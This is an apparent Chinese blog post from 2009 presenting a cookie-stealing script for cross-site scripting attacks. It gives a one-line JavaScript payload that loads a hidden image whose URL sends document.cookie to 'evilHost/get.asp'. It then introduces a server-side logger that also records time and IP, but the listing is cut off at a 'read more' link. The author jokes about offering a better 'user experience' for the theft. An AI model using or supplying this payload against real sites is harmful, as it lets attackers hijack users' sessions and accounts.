比较人性化的盗Cookies脚本
2009年10月20日
2 条评论 141 views
cookie窃取是最常见的跨站攻击之一,不管是用img,iframe方式,还是基于入库型或非入库的XSS,整个操作只需要带Cookie浏览器请求了某个的url即可完成。
本人偏爱Image:
img = new Image(); img.src = "http://evilHost/get.asp?cookie=" document.cookie;img.width=0;img.height=0
盗cookie脚本:
还是一个比较简单的程序,经过一点完善,在获取Cookie同时也记录的时间和IP,比较智能化与人性化,务求达到一个更好的用户体验,呵呵!
get.asp
code:
阅读全文...
姓名:Chinadu
近期评论